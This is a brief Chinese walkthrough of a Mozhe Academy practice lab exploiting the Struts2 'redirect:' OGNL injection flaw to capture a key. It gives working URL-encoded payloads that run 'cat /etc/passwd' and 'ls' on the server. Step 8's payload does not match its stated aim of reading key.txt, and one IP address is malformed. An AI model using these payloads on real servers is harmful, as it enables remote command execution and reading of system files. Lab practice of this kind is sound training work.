墨者学习
By/shy014
1.在墨者学院找到该靶场并点击启动靶场
2.找到后缀为.action的网http://219.153.49.228:49162/index.action
3.使用http://219.1549.228:49162/index.action?redirect:${1+1} 测试漏洞是否存在
4.使用url编码http://219.153.49.228:49162/index.action?redirect:%24%7B1%2b1%7D,redirect执行了表达式,确认存在漏洞。
5.使用执行任意命令的EXP,使用之前需要经过URL编码
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
6.使用ls命令读取文件
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'ls'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
7.将文件下载并打开,发现key.txt文件
8.读取key.txt的内容,依旧需要url编码
?redirect:${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
二.使用struts2漏洞检测工具
1.使用工具进行检测,发现存在漏洞
2.执行ls命令
3.读取key.txt值
4.提交key